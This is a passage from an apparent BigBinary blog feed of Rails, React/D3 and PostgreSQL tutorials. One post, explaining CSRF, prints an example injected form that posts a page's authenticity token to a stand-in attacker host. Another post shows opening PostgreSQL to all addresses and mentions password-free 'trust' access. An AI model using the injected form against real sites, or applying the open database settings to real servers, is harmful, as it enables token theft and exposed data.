&gt;  source 'http://gems.github.com' # #  -------------------------------------------</code></pre><p>To ignore all bundle config on the machine and run bundle install, set <code>BUNDLE_IGNORE_CONFIG</code> environment variable.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Using D3 JS with React JS]]></title>
       <author><name>Akshay Mohite</name></author>
      <link href="https://www.bigbinary.com/blog/using-d3-js-with-react-js"/>
      <updated>2016-02-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-d3-js-with-react-js</id>
      <content type="html"><![CDATA[<p>In this blog, we will see how to plot a simple line chart using ReactJS andD3JS.</p><p>If you are not familiar with ReactJS then please take a look at<a href="https://facebook.github.io/react/">official ReactJS webpage</a>. You can also lookat our<a href="https://bigbinary.com/videos/learn-reactjs-in-steps">Learn ReactJS in steps video series</a>.</p><h2>What is D3.js</h2><p><a href="http://d3js.org/">D3.js</a> is a Javascript library used to create interactive,dynamic visualizations.</p><p>Let's take a step by step look at how we can integrate ReactJS with D3JS to plotsome interactive visualizations.</p><h2>Step 1 - Get ReactJS example working</h2><p>We will be using <a href="https://jsfiddle.net/reactjs/69z2wepo/">JSFiddle example</a> from<a href="https://facebook.github.io/react/docs/getting-started.html">ReactJS Docs</a> tobegin with. Fork the JSFiddle example and you should be good to go.</p><h2>Step 2 - Add D3.js as an external resource</h2><p>We will be using <a href="https://cdnjs.cloudflare.com/ajax/libs/d3/3.5.12/d3.js">D3.js</a>from Cloudflare CDN. Add D3.js as an external resource as shown in the imagegiven below and type the following URL as an external resource.</p><pre><code class="language-plaintext">https://cdnjs.cloudflare.com/ajax/libs/d3/3.5.12/d3.js</code></pre><p><img src="/blog_images/2016/using-d3-js-with-react-js/add-d3-js-as-an-external-resource.png" alt="Add D3 js as an external resource"></p><h2>Step 3 - Build ReactJS components to create visualizations with D3.js</h2><p>Now let's try to draw a Line Chart using D3.js.</p><p>Let's create a <code>Line</code> component that renders line path for the data pointsprovided.</p><pre><code class="language-javascript">const Line = React.createClass({  propTypes: {    path: React.PropTypes.string.isRequired,    stroke: React.PropTypes.string,    fill: React.PropTypes.string,    strokeWidth: React.PropTypes.number,  },  getDefaultProps() {    return {      stroke: &quot;blue&quot;,      fill: &quot;none&quot;,      strokeWidth: 3,    };  },  render() {    let { path, stroke, fill, strokeWidth } = this.props;    return (      &lt;path d={path} fill={fill} stroke={stroke} strokeWidth={strokeWidth} /&gt;    );  },});</code></pre><p>Here in above code, <code>Line</code> component renders an<a href="https://developer.mozilla.org/en-US/docs/Web/SVG/Element/path">SVG path</a>.<a href="https://www.w3.org/TR/SVG/paths.html#DAttribute">Path data</a> <code>d</code> is generatedusing<a href="https://github.com/mbostock/d3/wiki/API-Reference#paths">D3 path functions</a>.</p><p>Let's create another component <code>DataSeries</code> that will render <code>Line</code> componentfor each series of data provided. This generates <code>path</code> based on <code>xScale</code> and<code>yScale</code> generated for plotting a line chart.</p><pre><code class="language-javascript">const DataSeries = React.createClass({  propTypes: {    colors: React.PropTypes.func,    data: React.PropTypes.object,    interpolationType: React.PropTypes.string,    xScale: React.PropTypes.func,    yScale: React.PropTypes.func,  },  getDefaultProps() {    return {      data: [],      interpolationType: &quot;cardinal&quot;,      colors: d3.scale.category10(),    };  },  render() {    let { data, colors, xScale, yScale, interpolationType } = this.props;    let line = d3.svg      .line()      .interpolate(interpolationType)      .x(d =&gt; {        return xScale(d.x);      })      .y(d =&gt; {        return yScale(d.y);      });    let lines = data.points.map((series, id) =&gt; {      return &lt;Line path={line(series)} stroke={colors(id)} key={id} /&gt;;    });    return (      &lt;g&gt;        &lt;g&gt;{lines}&lt;/g&gt;      &lt;/g&gt;    );  },});</code></pre><p>Here in above code<a href="https://github.com/mbostock/d3/wiki/SVG-Shapes#line">d3.svg.line</a> creates a newline generator which expects input as a two-element array of numbers.</p><p>Now we will create <code>LineChart</code> component that will calculate <code>xScale</code>, <code>yScale</code>based on data and will render <code>DataSeries</code> by passing <code>xScale</code>, <code>yScale</code>, <code>data</code>(input x,y values), width, height for the chart.</p><pre><code class="language-javascript">const LineChart = React.createClass({  propTypes: {    width: React.PropTypes.number,    height: React.PropTypes.number,    data: React.PropTypes.object.isRequired,  },  getDefaultProps() {    return {      width: 600,      height: 300,    };  },  render() {    let { width, height, data } = this.props;    let xScale = d3.scale      .ordinal()      .domain(data.xValues)      .rangePoints([0, width]);    let yScale = d3.scale      .linear()      .range([height, 10])      .domain([data.yMin, data.yMax]);    return (      &lt;svg width={width} height={height}&gt;        &lt;DataSeries          xScale={xScale}          yScale={yScale}          data={data}          width={width}          height={height}        /&gt;      &lt;/svg&gt;    );  },});</code></pre><p>Here<a href="https://github.com/mbostock/d3/wiki/Ordinal-Scales#ordinal">d3.scale.ordinal</a>constructs an ordinal scale that can have discrete domain while<a href="https://github.com/mbostock/d3/wiki/Quantitative-Scales#linear">d3.scale.linear</a>constructs a<a href="https://en.wikipedia.org/wiki/Linear_scale">linear quantitative scale</a>.</p><p>You can learn more about D3 Quantitative scales<a href="https://github.com/mbostock/d3/wiki/Quantitative-Scales">here</a>.</p><p>Now we need to call <code>LineDataSeries</code> component with the data.</p><pre><code class="language-javascript">let data = {  points: [    [      { x: 0, y: 20 },      { x: 1, y: 30 },      { x: 2, y: 10 },      { x: 3, y: 5 },      { x: 4, y: 8 },      { x: 5, y: 15 },      { x: 6, y: 10 },    ],    [      { x: 0, y: 8 },      { x: 1, y: 5 },      { x: 2, y: 20 },      { x: 3, y: 12 },      { x: 4, y: 4 },      { x: 5, y: 6 },      { x: 6, y: 2 },    ],    [      { x: 0, y: 0 },      { x: 1, y: 5 },      { x: 2, y: 8 },      { x: 3, y: 2 },      { x: 4, y: 6 },      { x: 5, y: 4 },      { x: 6, y: 2 },    ],  ],  xValues: [0, 1, 2, 3, 4, 5, 6],  yMin: 0,  yMax: 30,};ReactDOM.render(  &lt;LineChart data={data} width={600} height={300} /&gt;,  document.getElementById(&quot;container&quot;));</code></pre><p>An element with id <code>container</code> is replaced with content rendered by <code>LineChart</code>.</p><p>If we take a look at the output now, we see how the Line Chart gets plotted.</p><p><img src="/blog_images/2016/using-d3-js-with-react-js/react-js-d3-js-line-chart-example.png" alt="ReactJS + D3.js Line Chart example"></p><p>To build complex visualizations in a modularized fashion, we can use one of theopen source libraries mentioned below based on their advantages anddisadvantages.</p><h2>ReactJS + D3.js Open Source Projects</h2><p>Here are two popular open source ReactJS + D3.JS projects.</p><h4><a href="https://github.com/esbullington/react-d3">react-d3</a></h4><p><strong>Pros</strong></p><ul><li>Supports Bar chart, Line chart, Area chart, Pie chart, Candlestick chart,Scattered chart and Treemap.</li><li>Legend support.</li><li>Tooltips support.</li></ul><p><strong>Cons</strong></p><ul><li>No support for Animations. You can implement animations using<a href="https://github.com/mbostock/d3/wiki/API-Reference#transitions">D3 Transitions</a>.</li><li>Only stacked Bar chart support.</li></ul><h5><a href="https://github.com/codesuki/react-d3-components">react-d3-components</a></h5><p><strong>Pros</strong></p><ul><li>Custom<a href="https://github.com/mbostock/d3/wiki/API-Reference#d3scale-scales">scales</a>support.</li><li>Supports Bar chart (Stacked, Grouped), Line chart, Area chart, Pie chart,Scattered chart.</li><li>Tooltips support.</li></ul><p><strong>Cons</strong></p><ul><li>No Legend support.</li><li>No support for Animations.</li></ul><h3>Summary</h3><p>Below is final working example of JSFiddle built in the post.</p><p>&lt;scriptasyncsrc=&quot;https://jsfiddle.net/ad4od45f/7/embed/js,html,result/&quot;</p><blockquote><p>&lt;/script&gt;</p></blockquote>]]></content>
    </entry><entry>
       <title><![CDATA[Caching result sets and collection in Rails 5]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/activerecord-relation-cache-key"/>
      <updated>2016-02-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/activerecord-relation-cache-key</id>
      <content type="html"><![CDATA[<p>Often while developing a Rails application you may look to have one of these<a href="http://guides.rubyonrails.org/caching_with_rails.html">caching techniques</a> toboost the performance. Along with these, Rails 5 now provides a way of caching acollection of records, thanks to the introduction of the following method:</p><pre><code class="language-plaintext">ActiveRecord::Relation#cache_key</code></pre><h3>What is collection caching?</h3><p>Consider the following example where we are fetching a collection of all usersbelonging to city of Miami.</p><pre><code class="language-ruby">@users = User.where(city: 'miami')</code></pre><p>Here <code>@users</code> is a collection of records and is an object of class<code>ActiveRecord::Relation</code>.</p><p>Whether the result of the above query would be same depends on followingconditions.</p><ul><li>The query statement doesn't change. If we change city name from &quot;Miami&quot; to&quot;Boston&quot; then result might change.</li><li>No record is deleted. The count of records in the collection should be same.</li><li>No record is added. The count of records in the collection should be same.</li></ul><p>Rails community<a href="https://github.com/rails/rails/pull/20884">implemented caching for a collection of records</a>. Method <code>cache_key</code> was added to <code>ActiveRecord::Relation</code> which takes intoaccount many factors including query statement, updated_at column value and thecount of the records in collection.</p><h3>Understanding ActiveRecord::Relation#cache_key</h3><p>We have object <code>@users</code> of class <code>ActiveRecord::Relation</code>. Now let's execute<code>cache_key</code> method on it.</p><pre><code class="language-ruby"> @users.cache_key =&gt; &quot;users/query-67ed32b36805c4b1ec1948b4eef8d58f-3-20160116111659084027&quot;</code></pre><p>Let's try to understand each piece of the output.</p><p><strong><code>users</code></strong> represents what kind of records we are holding. In this example wehave collection of records of class <code>User</code>. Hence <code>users</code> is to illustrate thatwe are holding <code>users</code> records.</p><p><strong><code>query-</code></strong> is hardcoded value and it will be same in all cases.</p><p><strong><code>67ed32b36805c4b1ec1948b4eef8d58f</code></strong> is a digest of the query statement thatwill be executed. In our example it is<code>MD5( &quot;SELECT &quot;users&quot;.* FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;city&quot; = 'Miami'&quot;)</code></p><p><strong><code>3</code></strong> is the size of collection.</p><p><strong><code>20160116111659084027</code></strong> is timestamp of the most recently updated record inthe collection. By default, the timestamp column considered is <code>updated_at</code> andhence the value will be the most recent <code>updated_at</code> value in the collection.</p><h2>Using ActiveRecord::Relation#cache_key</h2><p>Let's see how to use <code>cache_key</code> to actually cache data.</p><p>In our Rails application, if we want to cache records of users belonging to&quot;Miami&quot; then we can take following approach.</p><pre><code class="language-ruby"># app/controllers/users_controller.rbclass UsersController &lt; ApplicationController  def index    @users = User.where(city: 'Miami')  endend# users/index.html.erb&lt;% cache(@users) do %&gt;  &lt;% @users.each do |user| %&gt;    &lt;p&gt; &lt;%= user.city %&gt; &lt;/p&gt;  &lt;% end %&gt;&lt;% end %&gt;# 1st HitProcessing by UsersController#index as HTML  Rendering users/index.html.erb within layouts/application   (0.2ms)  SELECT COUNT(*) AS &quot;size&quot;, MAX(&quot;users&quot;.&quot;updated_at&quot;) AS timestamp FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;city&quot; = ?  [[&quot;city&quot;, &quot;Miami&quot;]]Read fragment views/users/query-37a3d8c65b3f0f9ece7f66edcdcb10ab-4-20160704131424063322/30033e62b28c83f26351dc4ccd6c8451 (0.0ms)  User Load (0.1ms)  SELECT &quot;users&quot;.* FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;city&quot; = ?  [[&quot;city&quot;, &quot;Miami&quot;]]Write fragment views/users/query-37a3d8c65b3f0f9ece7f66edcdcb10ab-4-20160704131424063322/30033e62b28c83f26351dc4ccd6c8451 (0.0ms)Rendered users/index.html.erb within layouts/application (3.7ms)# 2nd HitProcessing by UsersController#index as HTML  Rendering users/index.html.erb within layouts/application   (0.2ms)  SELECT COUNT(*) AS &quot;size&quot;, MAX(&quot;users&quot;.&quot;updated_at&quot;) AS timestamp FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;city&quot; = ?  [[&quot;city&quot;, &quot;Miami&quot;]]Read fragment views/users/query-37a3d8c65b3f0f9ece7f66edcdcb10ab-4-20160704131424063322/30033e62b28c83f26351dc4ccd6c8451 (0.0ms)  Rendered users/index.html.erb within layouts/application (3.0ms)</code></pre><p>From above, we can see that for the first hit, a <code>count</code> query is fired to getthe latest <code>updated_at</code> and <code>size</code> from the users collection.</p><p>Rails will write a new cache entry with a <code>cache_key</code> generated from above<code>count</code> query.</p><p>Now on second hit, it again fires <code>count</code> query and checks if cache_key for thisquery exists or not.</p><p>If cache_key is found, it loads data without firing <code>SQL query</code>.</p><h5>What if your table doesn't have updated_at column?</h5><p>Previously we mentioned that <code>cache_key</code> method uses <code>updated_at</code> column.<code>cache_key</code> also provides an option of passing custom column as a parameter andthen the highest value of that column among the records in the collection willbe considered.</p><p>For example if your business logic considers a column named <code>last_bought_at</code> in<code>products</code> table as a factor to decide caching, then you can use the followingcode.</p><pre><code class="language-ruby"> products = Product.where(category: 'cars') products.cache_key(:last_bought_at) =&gt; &quot;products/query-211ae6b96ec456b8d7a24ad5fa2f8ad4-4-20160118080134697603&quot;</code></pre><h3>Edge cases to watch out for</h3><p>Before you start using <code>cache_key</code> there are some edge cases to watch out for.</p><p>Consider you have an application where there are 5 entries in <code>users</code> table with<code>city</code> Miami.</p><p><em><strong>Using limit puts incorrect size in cache key if collection is not loaded.</strong></em></p><p>If you want to fetch three users belonging to city &quot;Miami&quot; then you wouldexecute following query.</p><pre><code class="language-ruby"> users = User.where(city: 'Miami').limit(3) users.cache_key =&gt; &quot;users/query-67ed32b36805c4b1ec1948b4eef8d58f-3-20160116144936949365&quot;</code></pre><p>Here users contains only three records and hence the <code>cache_key</code> has 3 for sizeof collection.</p><p>Now let's try to execute same query without fetching the records first.</p><pre><code class="language-ruby"> User.where(name: 'Sam').limit(3).cache_key =&gt; &quot;users/query-8dc512b1408302d7a51cf1177e478463-5-20160116144936949365&quot;</code></pre><p>You can see that the count in the cache is 5 this time even though we have set alimit to 3. This is because the implementation ofActiveRecord::Base#collection_cache_key<a href="https://github.com/rails/rails/blob/39f383bad01e52c217c9007b5e9d3b239fe6a808/activerecord/lib/active_record/collection_cache_key.rb#L16">executes query without limit</a>to fetch the size of the collection.</p><h4>Cache key doesn't change when an existing record from a collection is replaced</h4><p>I want 3 users in the descending order of ids.</p><pre><code class="language-ruby"> users1 = User.where(city: 'Miami').order('id desc').limit(3) users1.cache_key =&gt; &quot;users/query-57ee9977bb0b04c84711702600aaa24b-3-20160116144936949365&quot;</code></pre><p>Above statement will give us users with ids <code>[5, 4, 3]</code>.</p><p>Now let's remove the user with id = 3.</p><pre><code class="language-ruby"> User.find(3).destroy users2 = User.where(first_name: 'Sam').order('id desc').limit(3) users2.cache_key =&gt; &quot;users/query-57ee9977bb0b04c84711702600aaa24b-3-20160116144936949365&quot;</code></pre><p>Note that <code>cache_key</code> both <code>users1</code> and <code>users2</code> is exactly same. This isbecause none of the parameters that affect the cache key is changed i.e.,neither the number of records, nor the query statement, nor the timestamp of thelatest record.</p><p>There is <a href="https://github.com/rails/rails/pull/21503">a discussion undergoing</a>about adding ids of the collection records as part of the cache key. This mighthelp solve the problems discussed above.</p><h4>Using group query gives incorrect size in the cache key</h4><p>Just like <code>limit</code> case discussed above <code>cache_key</code> behaves differently when datais loaded and when data is not loaded in memory.</p><p>Let's say that we have two users with first_name &quot;Sam&quot;.</p><p>First let's see a case where collection is not loaded in memory.</p><pre><code class="language-ruby"> User.select(:first_name).group(:first_name).cache_key =&gt; &quot;users/query-92270644d1ec90f5962523ed8dd7a795-1-20160118080134697603&quot;</code></pre><p>In the above case, the size is 1 in <code>cache_key</code>. For the system mentioned above,the sizes that you will get shall either be 1 or 5. That is, it is size of anarbitrary group.</p><p>Now let's see when collection is first loaded.</p><pre><code class="language-ruby"> users = User.select(:first_name).group(:first_name) users.cache_key =&gt; &quot;users/query-92270644d1ec90f5962523ed8dd7a795-2-20160118080134697603&quot;</code></pre><p>In the above case, the size is 2 in <code>cache_key</code>. You can see that the count inthe cache key here is different compared to that where the collection wasunloaded even though the query output in both the cases will be exactly same.</p><p>In case where the collection is loaded, the size that you get is equal to thetotal number of groups. So irrespective of what the records in each group are,we may have possibility of having the same cache key value.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Caching in development environment in Rails 5]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/caching-in-development-environment-in-rails5"/>
      <updated>2016-01-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/caching-in-development-environment-in-rails5</id>
      <content type="html"><![CDATA[<p>In Rails 4 if I'm doing work related to caching then first I need to turncaching &quot;on&quot; by opening file <code>config/environments/development.rb</code> and changingfollowing line.</p><pre><code class="language-ruby">config.action_controller.perform_caching = false</code></pre><p>After changing the value from <code>false</code> to <code>true</code>, I need to restart the server.</p><p>This means that if I am testing caching behavior locally then every time I turncaching &quot;on&quot; or &quot;off&quot; I need to restart the server.</p><h2>New command to create development cache in Rails 5</h2><p>Rails 5 has introduced a new command to create development cache and help ustest how caching behaves in development mode. Here is the<a href="https://github.com/rails/rails/issues/18875">issue</a> and here is the<a href="https://github.com/rails/rails/pull/20961">pull request</a>.</p><pre><code class="language-plaintext">$ rails dev:cacheDevelopment mode is now being cached.</code></pre><p>Execution of the above command creates file <code>caching-dev.txt</code> in <code>tmp</code>directory.</p><h2>How does it work?</h2><p>In Rails 5 when a brand new Rails app is created then<code>config/environments/development.rb</code> file will have the following snippet ofcode.</p><pre><code class="language-ruby">if Rails.root.join('tmp/caching-dev.txt').exist?  config.action_controller.perform_caching = true  config.static_cache_control = &quot;public, max-age=172800&quot;  config.cache_store = :mem_cache_storeelse  config.action_controller.perform_caching = false  config.cache_store = :null_storeend</code></pre><p>In the above code we are checking if the file <code>tmp/caching-dev.txt</code> is presentand then use <code>:mem_cache_store</code> to enable caching only if the file is found.</p><p>Also, here is a snippet from the<a href="https://github.com/rails/rails/blob/master/railties/lib/rails/commands/dev/dev_command.rb">dev cache source code</a>.</p><pre><code class="language-ruby">def dev_cache  if File.exist? 'tmp/caching-dev.txt'    File.delete 'tmp/caching-dev.txt'    puts 'Development mode is no longer being cached.'  else    FileUtils.touch 'tmp/caching-dev.txt'    puts 'Development mode is now being cached.'  end  FileUtils.touch 'tmp/restart.txt'end</code></pre><h2>What is the advantage</h2><p>The advantage is that we do not need to restart the server manually if we wantto turn caching &quot;on&quot; or &quot;off&quot;. It is internally taken care by the <code>dev_cache</code>method that is executed when <code>rails dev:cache</code> is executed. You can see in thesource code that <code>tmp/restart.txt</code> is being <strong>touched</strong>.</p><p>Please note that <strong>this feature is not supported</strong> by unicorn, thin and webrick.My guess is that DHH wants this feature because his team uses pow and powrestarts when <code>tmp/restart.txt</code> is touched. He also created an issue for<a href="https://github.com/rails/rails/issues/18874">spring to watch tmp/restart.txt</a>long time back.</p><h2>Disabling development cache</h2><p>Execute the same command that was used to enable caching. If caching waspreviously enabled then it will be turned &quot;off&quot; now.</p><pre><code class="language-plaintext">$ rails dev:cacheDevelopment mode is no longer being cached.</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Configure PostgreSQL to allow remote connection]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/configure-postgresql-to-allow-remote-connection"/>
      <updated>2016-01-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/configure-postgresql-to-allow-remote-connection</id>
      <content type="html"><![CDATA[<p>By default PostgreSQL is configured to be bound to &quot;localhost&quot;.</p><pre><code class="language-plaintext">$ netstat -nltProto Recv-Q Send-Q Local Address           Foreign Address         Statetcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTENtcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTENtcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTENtcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTENtcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTENtcp        0      0 127.0.0.1:3737          0.0.0.0:*               LISTENtcp6       0      0 :::22                   :::*                    LISTEN</code></pre><p>As we can see above port <code>5432</code> is bound to <code>127.0.0.1</code>. It means any attempt toconnect to the postgresql server from outside the machine will be refused. Wecan try hitting the port <code>5432</code> by using telnet.</p><pre><code class="language-plaintext">$ telnet 107.170.11.79 5432Trying 107.170.11.79...telnet: connect to address 107.170.11.79: Connection refusedtelnet: Unable to connect to remote host</code></pre><h2>Configuring postgresql.conf</h2><p>In order to fix this issue we need to find <code>postgresql.conf</code>. In differentsystems it is located at different place. I usually search for it.</p><pre><code class="language-plaintext">$ find / -name &quot;postgresql.conf&quot;/var/lib/pgsql/9.4/data/postgresql.conf</code></pre><p>Open <code>postgresql.conf</code> file and replace line</p><pre><code class="language-plaintext">listen_addresses = 'localhost'</code></pre><p>with</p><pre><code class="language-plaintext">listen_addresses = '*'</code></pre><p>Now restart postgresql server.</p><pre><code class="language-plaintext">$ netstat -nltProto Recv-Q Send-Q Local Address           Foreign Address         Statetcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTENtcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTENtcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTENtcp        0      0 0.0.0.0:5432            0.0.0.0:*               LISTENtcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTENtcp        0      0 127.0.0.1:2812          0.0.0.0:*               LISTENtcp6       0      0 ::1:11211               :::*                    LISTENtcp6       0      0 :::22                   :::*                    LISTENtcp6       0      0 :::5432                 :::*                    LISTENtcp6       0      0 ::1:25                  :::*                    LISTEN</code></pre><p>Here we can see that &quot;Local Address&quot; for port <code>5432</code> has changed to <code>0.0.0.0</code>.</p><h2>Configuring pg_hba.conf</h2><p>Let's try to connect to remote postgresql server using &quot;psql&quot;.</p><pre><code class="language-plaintext">$ psql -h 107.170.158.89 -U postgrespsql: could not connect to server: Connection refusedIs the server running on host &quot;107.170.158.89&quot; and acceptingTCP/IP connections on port 5432?</code></pre><p>In order to fix it, open <code>pg_hba.conf</code> and add following entry at the very end.</p><pre><code class="language-plaintext">host    all             all              0.0.0.0/0                       md5host    all             all              ::/0                            md5</code></pre><p>The second entry is for IPv6 network.</p><p>Do not get confused by &quot;md5&quot; option mentioned above. All it means is that apassword needs to be provided. If you want client to allow collection withoutproviding any password then change &quot;md5&quot; to &quot;trust&quot; and that will allowconnection unconditionally.</p><p>Restart postgresql server.</p><pre><code class="language-plaintext">$ psql -h 107.170.158.89 -U postgresPassword for user postgres:psql (9.4.1, server 9.4.5)Type &quot;help&quot; for help.postgres=# \l</code></pre><p>You should be able to see list of databases.</p><p>Now we are able to connect to postgresql server remotely.</p><p>Please note that in the real world you should be using extra layer of securityby using &quot;iptables&quot;.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 wraps all rake commands using rails]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-supports-rake-commands-using-rails"/>
      <updated>2016-01-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-supports-rake-commands-using-rails</id>
      <content type="html"><![CDATA[<p>In Rails 4 some commands start with <code>rails</code> and some commands start with <code>rake</code>.This could be quite confusing for people new to Rails. Let's see an example.</p><p>Our task is to write a database migration and then to run that migration.</p><pre><code class="language-ruby">rails g migration create_users</code></pre><p>Above command creates a migration. Now we need to run that migration.</p><pre><code class="language-ruby">rake db:migrate</code></pre><p>As you can see first command starts with <code>rails</code> and second command starts with<code>rake</code>.</p><p>In order to consolidate them we can either use <code>rails</code> for everything or we canuse <code>rake</code> for everything.</p><h2>Choosing rails command over rake command</h2><p>Some favor using <code>rake</code> over <code>rails</code>. But an important feature missing in Rakeis the ability to pass arguments.</p><pre><code class="language-ruby">rails console development</code></pre><p>In order to execute the above command using <code>rake</code> we will have to pass<code>console</code> and <code>development</code> as arguments. We can pass these values usingenvironment variables. That would mean adding additional code in Rake task tofetch right values and then only we will be able to invoke command<code>rails console development</code>.</p><h2>Rails 5 enables executing rake commands with rails</h2><p>Rails core team <a href="https://github.com/rails/rails/pull/22288">decided</a> to haveconsistency by enabling <code>rails</code> command to support everything that <code>rake</code> does.</p><p>For example in Rails 5 commands like <code>db:migrate</code>, <code>setup</code>, <code>test</code> etc which arepart of <code>rake</code> command in Rails 4 are now being supported by <code>rails</code> command.However you can still choose to use <code>rake</code> to run those commands similar to howthey were run in Rails 4. This is because Rails community has<a href="https://github.com/rails/rails/blob/f718e52bcce02bc137263ead3a9d9f5df1c42c37/railties/lib/rails/commands/rake_proxy.rb">introduced Rake Proxy</a>instead of completely moving the command options from <code>rake</code> to <code>rails</code>.</p><p>What happens internally is that when <code>rails db:migrate</code> command is executed,Rails checks if <code>db:migrate</code> is something that <code>rails</code> natively supports or not.In this case <code>db:migrate</code> is not natively supported by <code>rails</code>, so Railsdelegates the execution to Rake via Rake Proxy.</p><p>If you want to see all the commands that is supported by <code>rails</code> in Rails 5 thenyou can get a long list of options by executing <code>rails --help</code>.</p><h3>Use app namespace for framework tasks in Rails 5</h3><p>As <code>rails</code> command is now preferred over <code>rake</code> command, few rails namespacedframework tasks started looking little odd.</p><pre><code class="language-bash">$ rails rails:update$ rails rails:template$ rails rails:templates:copy$ rails rails:update:configs$ rails rails:update:bin</code></pre><p>So, Rails team decided to change the namespace for these tasks from <code>rails</code> to<code>app</code>.</p><pre><code class="language-bash">$ rails app:update$ rails app:template$ rails app:templates:copy$ rails app:update:configs$ rails app:update:bin</code></pre><p>Using <code>rails rails:update</code> will now give deprecation warning like:<code>DEPRECATION WARNING: Running update with the rails: namespace is deprecated in favor of app: namespace. Run bin/rails app:update instead</code>.</p><h2>More improvements in pipeline</h2><p>In Rails 4, the routes are usually searched like this.</p><pre><code class="language-plaintext">$ rake routes | grep pattern</code></pre><p>There <a href="https://github.com/rails/rails/issues/18902">is an effort underway</a> tohave a Rails command which might work as shown below.</p><pre><code class="language-plaintext">$ rails routes -g pattern</code></pre><p>There is also<a href="https://github.com/rails/rails/pull/20420">an effort to enable lookup for controller</a>like this.</p><pre><code class="language-plaintext">$ rails routes -c some_controller</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Each form gets its own CSRF token in Rails 5]]></title>
       <author><name>Prajakta Tambe</name></author>
      <link href="https://www.bigbinary.com/blog/per-form-csrf-token-in-rails-5"/>
      <updated>2016-01-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/per-form-csrf-token-in-rails-5</id>
      <content type="html"><![CDATA[<p>We have <a href="csrf-and-rails">written an extensive blog</a> on what <strong>CSRF</strong> is and whatsteps Rails 4 takes to prevent CSRF. We encourage you to read that blog to fullyunderstand rest of this article.</p><h2>Nested form can get around CSRF protection offered by Rails 4</h2><p>A typical form generated in Rails 4 might look like this.</p><pre><code class="language-plaintext">&lt;form method= &quot;post&quot; action=&quot;/money_transfer&quot;&gt;  &lt;input type=&quot;hidden&quot; name=&quot;authenticity_token&quot; value=&quot;token_value&quot;&gt;&lt;/form&gt;</code></pre><p>Using code-injection, a Hacker can add another form tag above the form taggenerated by Rails using JavaScript. Now the markup looks like this.</p><pre><code class="language-plaintext">&lt;form method=&quot;post&quot; action=&quot;http://www.fraud.com/fraud&quot;&gt;  &lt;form method= &quot;post&quot; action=&quot;/money_transfer&quot;&gt;    &lt;input type=&quot;hidden&quot; name=&quot;authenticity_token&quot; value=&quot;token_value&quot;&gt;  &lt;/form&gt;&lt;/form&gt;</code></pre><p>HTML specification<a href="http://stackoverflow.com/questions/379610/can-you-nest-html-forms">does not allow nested forms</a>.</p><p>Since nested forms are not allowed browser will accept the top most level form.In this case that happens to be the form created by the hacker. When this formis submitted then &quot;authenticity_token&quot; is also submitted and Rails will do itscheck and will say everything is looking good and thus hacker will be able tohack the site.</p><h2>Rails 5 fixes the issue by generating a custom token for a form</h2><p>In Rails 5,<a href="https://github.com/rails/rails/pull/22275">CSRF token can be added for each form</a>.Each CSRF token will be valid only for the method/action of the form it wasincluded in.</p><p>You can add following line to your controller to add authenticity token specificto method and action in each form tag of the controller.</p><pre><code class="language-ruby">class UsersController &lt; ApplicationController  self.per_form_csrf_tokens = trueend</code></pre><p>Adding that code to each controller feels burdensome. In that case you canenable this behavior for all controllers in the application by adding followingline to an initializer.</p><pre><code class="language-ruby"># config/application.rbRails.configuration.action_controller.per_form_csrf_tokens = true</code></pre><p>This will add authenticity token specific to method and action in each form tagof the application. After adding that token the generated form might look likeas shown below.</p><pre><code class="language-plaintext">&lt;form method= &quot;post&quot; action=&quot;/money_transfer&quot;&gt;  &lt;input type=&quot;hidden&quot; name=&quot;authenticity_token&quot; value=&quot;money_transfer_post_action_token&quot;&gt;&lt;/form&gt;</code></pre><p>Authenticity token included here will be specific to action <code>money_transfer</code> andmethod <code>post</code>. Attacker can still grab authenticity_token here, but attack willbe limited to <code>money_transfer post</code> action.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rendering views outside of controllers in Rails 5]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rendering-views-outside-of-controllers-in-rails-5"/>
      <updated>2016-01-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rendering-views-outside-of-controllers-in-rails-5</id>
      <content type="html"><![CDATA[<p>Rails request-response cycle is very easy to understand. A request hits the app,a route is matched to a controller action from <code>routes.rb</code>, and finallycontroller action processes the request and renders HTML or JSON based on thetype of the request.</p><p>But sometimes we want to render our HTML or JSON response outside of thisrequest-response cycle.</p><p>For example let's say user is allowed to download PDF version of a report onweb. This can be done using request-response cycle. We also need to send aweekly report to managers and the email should have the report as an attachment.Now we need to generate the same PDF but since emails are sent using backgroundjob the request-response cycle is missing.</p><p>Rails 5 has this feature baked in.</p><p>Let's say we have a <code>OrdersController</code> and we want to render individual orderoutside of controller.</p><p>Fire up <code>rails console</code> and execute following command.</p><pre><code class="language-ruby">OrdersController.render :show, assigns: { order: Order.last }</code></pre><p>This will render <code>app/views/orders/show.html.erb</code> with <code>@order</code> set to<code>Order.last</code>. Instance variables can be set using <code>assigns</code> in 